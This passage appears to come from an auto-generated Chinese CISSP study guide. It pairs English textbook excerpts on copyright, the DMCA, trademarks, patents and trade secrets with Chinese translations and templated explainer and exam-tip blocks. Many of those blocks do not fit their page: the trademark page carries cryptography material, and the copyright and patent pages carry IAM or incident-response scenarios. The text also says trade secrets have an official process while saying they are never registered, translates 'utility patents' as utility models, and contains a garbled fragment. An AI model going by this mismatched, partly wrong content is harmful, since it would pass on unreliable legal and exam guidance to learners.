计算系统所必需的,并且也常被用作行业网络安全基准。 NIST SP 800‑171: 保护非联邦系统和组织中的受控非机密信息。 遵守该标准 的安全控制措施(与NIST 800‑53中的措施非常相似)通常被纳入合同要求中 q求b y g政府机构。 联邦承包商通常必须遵守NIST SP 800‑171。 NIST网络安全框架(CSF)是一套标准,旨在作为自愿的基于风险的框架, 以保护信息和系统。 这一波新要求中的第三部法律是2014年《国家网络安全保护法》。 该法律授 权国土安全部建立一个国家网络安全和通信集成中心。 该中心的作用是作为 联邦机构与民用组织之间共享网络安全风险、事件、分析和预警的接口。 知识产权 (IP) 美国在全球经济中的角色正在从商品制造商转向服务提供者。 这一趋势也体现 在许多世界主要工业化国家中。 随着向服务提供转型,知识产权(IP)在许多企 业中的作用日益重要。 事实上,可以认为,许多大型跨国公司最有价值的资产 simply 是我们所有人都熟悉的品牌名称。 像戴尔、宝洁和默克这样的公司名称 能为任何产品带来即时的可信度。 出版公司、电影制片方和艺术家依赖其创意 成果维持生计。

许多产品依赖于秘密配方或生产技术——例如可口可乐的传奇 秘密配方或肯德基的秘密香料混合物。 这些无形资产统称为知识产权(IP),并有一系列法律法规旨在保护其所有者 的权利。 毕竟,如果一家书店只为每位作者的书籍购买一本,然后为所有顾客 复制副本,那将剥夺作者应得的劳动成果,这显然不公平。 在以下章节中,我 们将探讨围绕四种主要类型知识产权的法律——

小白解释

场景先行:你是公司的安全负责人,正在读第 284 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

标准:标准给出必须满足的最低要求。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Minimum level、mandatory requirement 常对应 standard。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
标准 标准给出必须满足的最低要求。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
学习单元 13 / PDF P285

第 285 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

copyrights, trademarks, patents, and trade secrets. We'll also discuss how these concepts specifically concern information security professionals. Many countries protect (or fail to protect) these rights in different ways, but the basic concepts ring true throughout the world. Some countries are notorious for violating IP rights and are world renowned for their blatant disregard of copyright and patent law. If you're planning to do business in countries where this is a problem, you should definitely consult with an attorney who specializes in this area.

Copyright and the Digital Millennium Copyright Act Copyright law guarantees the creators of “original works of authorship” protection against the unauthorized duplication of their work. Eight broad categories of works qualify for copyright protection: Literary works Musical works Dramatic works Pantomimes and choreographic works Pictorial, graphical, and sculptural works Motion pictures and other audiovisual works Sound recordings Architectural works There is precedent for copyrighting computer software—it's done under the scope of literary works. However, it's important to note that copyright law protects only the expression inherent in computer software—that is, the actual source code.

It does not protect the ideas or process behind the software. There has also been some question over whether copyrights can be extended to cover the “look and feel” of a software package's graphical user interface. Court decisions have gone in both directions on this matter; if you will be involved in this type of issue, you should consult a qualified intellectual property attorney to determine the current state of legislation and case law.

中文直译 / 整理

版权、商标、专利和商业秘密。 我们还将讨论这些概念如何具体涉及信息安全 专业人员。 各国保护(或未能保护)这些权利的方式各不相同,但基本概念在 全球范围内普遍适用。 一些国家因侵犯知识产权而臭名昭著,以公然无视版权和专利法而闻 名世界。 如果您计划在存在此类问题的国家开展业务,务必咨询专门从事 该领域的律师。 版权与数字千年版权法案 版权法保障“原创作品”的创作者免受其作品被未经授权复制的侵害。 八大 类作品可获得版权保护: 文学作品 音乐作品 戏剧作品 哑剧和舞蹈作品 绘画、图形和雕塑作品 电影和其他视听作品 录音制品 建筑作品 计算机软件的版权保护已有先例——它属于文学作品的范畴。 然而,需要注意的 是,版权法仅保护计算机软件中固有的表达形式,即实际的源代码,并不保护 软件背后的思路或过程。 此外,对于版权是否可延伸至软件图形用户界面的 “外观和感觉”也存在一些争议。 法院对此问题的判决意见不一; 如果您将涉 及此类问题,建议咨询合格的知识产权律师,以确定现行立法和判例的现状。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 285 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
学习单元 14 / PDF P286

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

There is a formal procedure to obtain a copyright that involves sending copies of the protected work along with an appropriate registration fee to the U.S. Copyright Office. For more information on this process, visit the office's website at www.copyright.gov. However, officially registering a copyright is not a prerequisite for copyright enforcement. Indeed, the law states that the creator of a work has an automatic copyright from the instant the work is created. If you can prove in court that you were the creator of a work (perhaps by publishing it), you will be protected under copyright law.

Official registration merely provides the government's acknowledgment that they received your work on a specific date. Copyright ownership always defaults to the creator of a work. The exceptions to this policy are works for hire. A work is considered “for hire” when it is made for an employer during the normal course of an employee's workday. For example, when an employee in a company's public relations department writes a press release, the press release is considered a work for hire. A work may also be considered a work for hire when it is made as part of a written contract declaring it as such. Current copyright law provides for a lengthy period of protection.

Works by one or more authors are protected until 70 years after the death of the last surviving author. Works for hire and anonymous works are provided protection for 95 years from the date of first publication or 120 years from the date of creation, whichever is shorter. In 1998, Congress recognized the rapidly changing digital landscape that was stretching the reach of existing copyright law. To help meet this challenge, it enacted the hotly debated Digital Millennium Copyright Act (DMCA). The DMCA also serves to bring U.S. copyright law into compliance with terms of two World Intellectual Property Organization (WIPO) treaties.

The first major provision of the DMCA is the prohibition of attempts to circumvent copyright protection mechanisms placed on a protected work by the copyright holder. This clause was designed to protect copy-prevention mechanisms placed on digital media such as compact discs (CDs) and digital video discs (DVDs). The DMCA provides for penalties of up to $1 million and 10 years in prison for repeat offenders. Nonprofit institutions such as libraries and schools are exempted from this provision. The DMCA also limits the liability of Internet service providers (ISPs) when their circuits are used by criminals violating the copyright law.

The DMCA recognizes that ISPs have a legal status similar to the “common carrier”

中文直译 / 整理

获得版权有一套正式程序,需将受保护作品的副本连同适当的注册费用一并提 交至美国版权局。 有关此流程的更多信息,请访问其网站:www.copyright.gov。 然而,官方注册版权并非执行版权保护的先决条件。 事实上,法律规定,作品 创作者在作品完成的瞬间即自动享有版权。 如果您能在法庭上证明自己是作品 的创作者(例如通过发布作品),您将受到版权法的保护。 官方注册仅意味着 政府确认其在特定日期收到了您的作品。 版权归属始终默认归作品的创作者所有。 此政策的例外情况是雇佣作品。 当员 工在正常工作时间内为雇主创作作品时,该作品被视为“雇佣作品”。 例如, 当公司公关部门的员工撰写新闻稿时,该新闻稿即被视为雇佣作品。 当作品是 作为书面合同的一部分并明确声明为雇佣作品时,也可能被视为雇佣作品。 现行版权法规定了较长的保护期限。 由一名或多名作者创作的作品,其保护期 持续至最后一位在世作者去世后70年。 雇佣作品和匿名作品的保护期为自首次 出版之日起95年,或自创作之日起120年,以较短者为准。 1998年,国会认识到数字环境的迅速变化正在扩展现有版权法的适用范围。

为应对这一挑战,国会通过了备受争议的《数字千年版权法案》(DMCA)。 该法案还旨在使美国版权法符合世界知识产权组织(WIPO)两项条约的规定。 《数字千年版权法》的第一个主要条款是禁止试图规避版权持有人对受保护作 品设置的版权保护机制。 该条款旨在保护应用于数字媒体(如光盘(CD)和 数字视频光盘(DVD))上的防复制机制。 对于累犯者,《数字千年版权法》 规定最高可处100万美元罚款和10年监禁。 图书馆和学校等非营利机构可免于 该条款的约束。 《数字千年版权法》还限制了互联网服务提供商(ISPs)在他们的电路被犯罪分子用 于侵犯版权法时的责任。 《数字千年版权法》承认,互联网服务提供商的法律地位类 似于“公共承运人”

小白解释

场景先行:你是公司的安全负责人,正在读第 286 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

政策:政策是高层原则,说明必须遵守什么。

程序:程序是一步一步怎么做。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

ISO 偏标准和管理体系。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
学习单元 15 / PDF P287

章末总结与练习题

章末内容用来反查自己是否真的理解,而不是只背答案。

教材原文段落

status of telephone companies and does not hold them liable for the “transitory activities” of their users. To qualify for this exemption, the service provider's activities must meet the following requirements (quoted directly from the Digital Millennium Copyright Act of 1998, U.S. Copyright Office Summary, December 1998): The transmission must be initiated by a person other than the provider. The transmission, routing, provision of connections, or copying must be carried out by an automatic technical process without selection of material by the service provider. The service provider must not determine the recipients of the material.

Any intermediate copies must not ordinarily be accessible to anyone other than anticipated recipients and must not be retained for longer than reasonably necessary. The material must be transmitted with no modification to its content. The DMCA also exempts activities of service providers related to system caching, search engines, and the storage of information on a network by individual users. However, in those cases, the service provider must take prompt action to remove copyrighted materials upon notification of the infringement.

Congress also included provisions in the DMCA that allow the creation of backup copies of computer software and any maintenance, testing, or routine usage activities that require software duplication. These provisions apply only if the software is licensed for use on a particular computer, the usage is in compliance with the license agreement, and any such copies are immediately deleted when no longer required for a permitted activity. Finally, the DMCA spells out the application of copyright law principles to the streaming of audio and/or video content over the Internet.

The DMCA states that these uses are to be treated as “eligible nonsubscription transmissions.” Trademarks Copyright laws are used to protect creative works; there is also protection for trademarks, which are words, slogans, and logos used to identify a company and its products or services. For example, a business might obtain a copyright on its sales brochure to ensure that competitors can't duplicate its sales materials. That same business might also seek to obtain trademark protection

中文直译 / 整理

地位,类似于电话公司,并不对用户的“临时性活动”承担责任。 要符合这一 豁免条件,服务提供商的活动必须满足以下要求(直接引自1998年《数字千年 版权法》,美国版权局摘要,1998年12月): 传输必须由提供者以外的人员发起。 传输、路由、连接提供或复制必须通过自动技术过程进行,服务提供者不 得选择材料。 服务提供者不得确定材料的接收者。 任何中间副本通常不得被除预期接收者之外的任何人访问,且不得保 留超过合理必要的期限。 传输的材料不得对其内容进行任何修改。 DMCA 还豁免了服务提供者与系统缓存、搜索引擎以及用户在网络中存 储信息相关的活动。 然而,在这些情况下,服务提供者在收到侵权通知后 必须立即采取行动删除受版权保护的材料。 国会还在《数字千年版权法》中纳入了允许创建计算机软件备份副本的规定, 以及任何需要软件复制的维护、测试或常规使用活动。 这些规定仅适用于软件 已获得在特定计算机上使用的许可、使用符合许可协议,且任何此类副本在不 再需要用于 permitted 活动时立即删除的情况。 最后,《数字千年版权法》明确了版权法原则在网络流媒体传输音频和/或视频内容 时的应用。

《数字千年版权法》规定,这些用途应被视为“合格的非订阅传输”。 商标 版权法用于保护创意作品; 此外,还有对商标的保护,商标是用于识别公司及 其产品或服务的词语、口号和标志。 例如,一家企业可能会为其销售手册获取 版权,以确保竞争对手无法复制其销售材料。 该企业也可能寻求获得商标保护

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:章末内容用来反查自己是否真的理解,而不是只背答案。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“章末总结与练习题”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 16 / PDF P288

应有谨慎与尽职调查

一个偏采取合理行动,一个偏持续验证监督。

教材原文段落

for its company name and the names of specific products and services that it offers to its clients. The main objective of trademark protection is to avoid confusion in the marketplace while protecting the intellectual property rights of people and organizations. As with copyright protection, trademarks do not need to be officially registered to gain protection under the law. If you use a trademark in the course of your public activities, you are automatically protected under any relevant trademark law and can use the ™ symbol to show that you intend to protect words or slogans as trademarks.

If you want official recognition of your trademark, you can register it with the United States Patent and Trademark Office (USPTO). This process generally requires an attorney to perform a due diligence comprehensive search for existing trademarks that might preclude your registration. The entire registration process can take more than a year from start to finish. Once you've received your registration certificate from the USPTO, you can denote your mark as a registered trademark with the ® symbol. One major advantage of trademark registration is that you may register a trademark that you intend to use but are not necessarily already using.

This type of application is called an intent to use application and conveys trademark protection as of the date of filing provided that you actually use the trademark in commerce within a certain time period. If you opt not to register your trademark with the PTO, your protection begins only when you first use the trademark. The acceptance of a trademark application in the United States depends on these two main requirements: The trademark must not be confusingly similar to another trademark— you should determine this during your attorney's due diligence search. There will be an open opposition period during which other companies may dispute your trademark application.

The trademark should not be descriptive of the goods and services that you will offer. For example, “Mike's Software Company” would not be a good trademark candidate because it describes the product produced by the company. The USPTO may reject an application if it considers the trademark descriptive. In the United States, trademarks are granted for an initial period of 10 years and can be renewed for unlimited successive 10-year periods.

中文直译 / 整理

以保护其公司名称以及向客户提供的具体产品和服务的名称。 商标保护的主要目的是在保护个人和组织的知识产权的同时,避免市场上的混 淆。 与版权保护一样,商标无需正式注册即可获得法律保护。 如果您在公共活 动中使用商标,则自动受到相关商标法的保护,并可以使用TM符号表明您有 意将词语或口号作为商标进行保护。 如果您希望获得商标的官方认可,可以向 美国专利商标局(USPTO)申请注册。 这一过程通常需要律师进行彻底的现 有商标检索,以确认是否存在可能妨碍您注册的商标。 整个注册过程从开始到 完成通常需要一年以上的时间。 一旦您收到USPTO颁发的注册证书,就可以 使用®符号标明您的标志为注册商标。 商标注册的一个主要优势是,您可以注册您打算使用但尚未实际使用的商标。 这种申请称为意图使用申请,只要您在规定期限内实际在商业中使用该商标, 其商标保护即从申请日开始生效。 如果您选择不向USPTO注册您的商标,您 的保护仅从您首次使用该商标时开始。 美国商标申请的批准取决于以下两个主要要求: 该商标不得与另一商标混淆性相似——您应在律师的尽职调查搜索期间确 定这一点。 在公开异议期内,其他公司可能会对您的商标申请提出异议。

该商标不应描述您将提供的商品和服务。 例如,“Mike's Software Company”不是一个良好的商标候选,因为它描述了该公司生产的产品。 如果美国专利商标局认为该商标具有描述性,可能会驳回申请。 在美国,商标的初始有效期为10年,可无限期地以连续的10年期限进行续展。

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:一个偏采取合理行动,一个偏持续验证监督。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

尽职调查:尽职调查是持续检查、验证和监督是否做到了。

数字证书:数字证书把身份和公钥绑定起来,由可信 CA 签发。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“应有谨慎与尽职调查”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Due diligence 偏“确认事情被正确执行”。

证书不是密钥本身,而是身份与公钥的可信绑定。

网络题先定位层次,再判断协议、设备或攻击位置。

日志要保护完整性、时间同步和访问控制。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
尽职调查 尽职调查是持续检查、验证和监督是否做到了。
数字证书 数字证书把身份和公钥绑定起来,由可信 CA 签发。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 17 / PDF P289

第 289 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Patents Utility patents protect the intellectual property rights of inventors. They provide a period of 20 years from the time of the invention (from the date of initial application) during which the inventor is granted exclusive rights to use the invention (whether directly or via licensing agreements). At the end of the patent exclusivity period, the invention is in the public domain available for anyone to use. Patents have three main requirements: The invention must be new. Inventions are patentable only if they are original ideas. The invention must be useful. It must actually work and accomplish some sort of task. The invention must not be obvious.

You could not, for example, obtain a patent for your idea to use a drinking cup to collect rainwater. This is an obvious solution. You might, however, be able to patent a specially designed cup that optimizes the amount of rainwater collected while minimizing evaporation. Protecting Software There is some ongoing controversy over how the intellectual property contained in software should be protected. Software seems to clearly qualify for copyright protection, but litigants have disputed this notion in court. Similarly, companies have applied for and received patents covering the way that their software “inventions” function.

Cryptographic algorithms, such as RSA and Diffie–Hellman, both enjoyed patent protection at one point. This, too, is a situation that poses some legal controversy. In the technology field, patents have long been used to protect hardware devices and manufacturing processes. There is plenty of precedent on the side of inventors in those areas. Recent patents have also been issued covering software programs and similar mechanisms, but these patents have become somewhat controversial because many of them are viewed by the technical community as overly broad. The issuance of these broad patents led to the

中文直译 / 整理

专利 实用新型专利保护发明者的知识产权。 它们自发明之日起(从首次申请之 日起)提供20年的保护期,在此期间,发明者享有独家使用该发明的权利 (无论是直接使用还是通过许可协议)。 专利独占期结束后,该发明进入公共 领域,任何人都可以使用。 专利有三个主要要求: 发明必须是新的。 只有原创性的想法才能获得专利。 发明必须具有实用性。 它必须能够实际运行并完成某种任务。 发明必须不显而易见。 例如,你不能为使用饮水杯收集雨水的想法申请专 利,因为这是一种显而易见的解决方案。 然而,你可能可以为一种专门设 计的杯子申请专利,这种杯子能在最小化蒸发的同时优化收集的雨水量。 保护软件 关于软件中包含的知识产权应如何保护,目前仍存在一些争议。 软件显然 符合版权保护的条件,但诉讼双方曾在法庭上对这一观点提出过争议。 同样,公司已申请并获得了涵盖其软件“发明”功能的专利。 加密算法, 如RSA和Diffie–Hellman,都曾享有专利保护。 这也是一种引发法律争 议的情形。 在技术领域,专利长期以来被用于保护硬件设备和制造工艺。 在这些领域,发 明人方面已有大量先例。

最近颁发的专利也涵盖了软件程序和类似机制,但由 于技术界认为其中许多专利过于宽泛,因此这些专利已引发一定争议。 这些宽 泛专利的颁发导致了

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

程序:程序是一步一步怎么做。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 289 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Step-by-step、SOP 常对应 procedure。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
程序 程序是一步一步怎么做。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 18 / PDF P290

第 290 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

evolution of businesses that exist solely as patent holding companies that derive their revenue by engaging in legal action against companies that they feel infringe upon the patents held in their portfolio. These companies are known by many in the technology community under the derogatory name “patent trolls.” Design and Plant Patents The patents described in this section are utility patents, a type of patent that protects the intellectual property around how an invention functions. Inventors may also take advantage of design patents. These patents cover the appearance of an invention and last for only 15 years.

They do not protect the idea of an invention, only the form of the invention, so they are generally seen as a weaker form of intellectual property protection than utility patents, but they are also easier to obtain. A third type of patent, plant patents, cover new species of plants that are created by people. Those aren't normally very relevant to cybersecurity matters, unless you work in an agricultural industry! Trade Secrets Many companies have intellectual property that is absolutely critical to their business, and significant damage would result if it were disclosed to competitors and/or the public—in other words, trade secrets.

We previously mentioned two examples of this type of information from popular culture— the secret formula for Coca-Cola and KFC's “secret blend of herbs and spices.” Other examples are plentiful; a manufacturing company may want to keep secret a certain manufacturing process that only a few key employees fully understand, or a statistical analysis company might want to safeguard an advanced model developed for in-house use.

Two of the previously discussed intellectual property tools—copyrights and patents—could be used to protect this type of information, but with these two major disadvantages: Filing a copyright or patent application requires that you publicly disclose the details of your work or invention. This automatically removes the “secret” nature of your property and may harm your firm by removing the mystique surrounding a product or by allowing

中文直译 / 整理

仅以持有专利为业务的公司的兴起,这些公司通过对被认为侵犯其专利组合 中专利的公司提起法律诉讼来获取收入。 这些公司在技术界常被称为贬义的 “专利流氓”。 设计与植物专利 本节所述的专利为实用新型专利,这是一种保护发明功能相关知识产权的专利 类型。 发明人还可以利用外观设计专利。 这些专利涵盖发明的外观,有效期仅为 15年。 它们不保护发明的思想,只保护发明的形式,因此通常被视为比实 用新型专利更弱的知识产权保护形式,但更容易获得。 第三种专利是植物专利,涵盖由人类培育的新植物品种。 这些专利通常与 网络安全事务无关,除非您从事农业行业! 商业秘密 许多公司拥有对其业务至关重要的知识产权,一旦泄露给竞争对手和/或公众, 将造成重大损害——换句话说,商业秘密。 我们之前曾提到过两个流行文化中的 此类信息示例——可口可乐的秘方和肯德基的“秘制香料混合物”。 其他例子不 胜枚举:一家制造公司可能希望保守某种只有少数关键员工完全了解的制造工 艺,或者一家统计分析公司可能希望保护其为内部使用开发的先进模型。

之前讨论过的两种知识产权工具——版权和专利——可用于保护此类信息,但 存在以下两个主要缺点: 提交版权或专利申请要求您公开您作品或发明的详细信息。 这会自动消除 您财产的“保密”性质,并可能通过消除产品背后的神秘感或允许

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 290 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 19 / PDF P291

第 291 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

unscrupulous competitors to copy your property in violation of international intellectual property laws. Copyrights and patents both provide protection for a limited period of time. Once your legal protection expires, other firms are free to use your work at will (and they have all the details from the public disclosure you made during the application process!). There actually is an official process regarding trade secrets. By their nature you don't register them with anyone; you keep them to yourself. To preserve trade secret status, you must implement adequate controls within your organization to ensure that only authorized personnel with a need to know the secrets have access to them.

You must also ensure that anyone who does have this type of access is bound by a nondisclosure agreement (NDA) that prohibits them from sharing the information with others and provides penalties for violating the agreement. Consult an attorney to ensure that the agreement lasts for the maximum period permitted by law. In addition, you must take steps to demonstrate that you value and protect your intellectual property. Failure to do so may result in the loss of trade secret protection. Trade secret protection is one of the best ways to protect computer software. As discussed in the previous section, patent law does not provide adequate protection for computer software products.

Copyright law protects only the actual text of the source code and doesn't prohibit others from rewriting your code in a different form and accomplishing the same objective. If you treat your source code as a trade secret, it keeps it out of the hands of your competitors in the first place. This is the technique used by large software development companies such as Microsoft to protect their core base of intellectual property.

中文直译 / 整理

不道德的竞争对手违反国际知识产权法复制您的财产,从而损害您 的公司。 版权和专利均提供有限期限的保护。 一旦您的法律保护到期,其他公司便 可自由使用您的成果(并且他们已掌握您在申请过程中公开的所有细节! ) 实际上,商业秘密有正式的保护程序。 根据其性质,您无需向任何机构注册; 您应将其保密。 为维持商业秘密的法律地位,您必须在组织内部实施充分的管 控措施,确保只有需要知悉秘密的授权人员才能接触相关信息。 您还必须确保 所有获得此类访问权限的人员均签署保密协议(NDA),禁止其向他人披露 信息,并规定违反协议的处罚措施。 请咨询律师,以确保协议的有效期达到法 律允许的最长期限。 此外,您必须采取措施表明您重视并保护您的知识产权。 未能这样做可能导致商业秘密保护失效。 商业秘密保护是保护计算机软件的最佳方式之一。 如前一节所述,专利法未能 为计算机软件产品提供充分的保护。 版权法仅保护源代码的实际文本,但并不 禁止他人以不同的形式重写您的代码并实现相同的目标。 如果您将源代码视为 商业秘密,便可从一开始就防止竞争对手获取。 这是微软等大型软件开发公司 保护其核心知识产权所采用的技术。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

程序:程序是一步一步怎么做。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 291 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

Step-by-step、SOP 常对应 procedure。

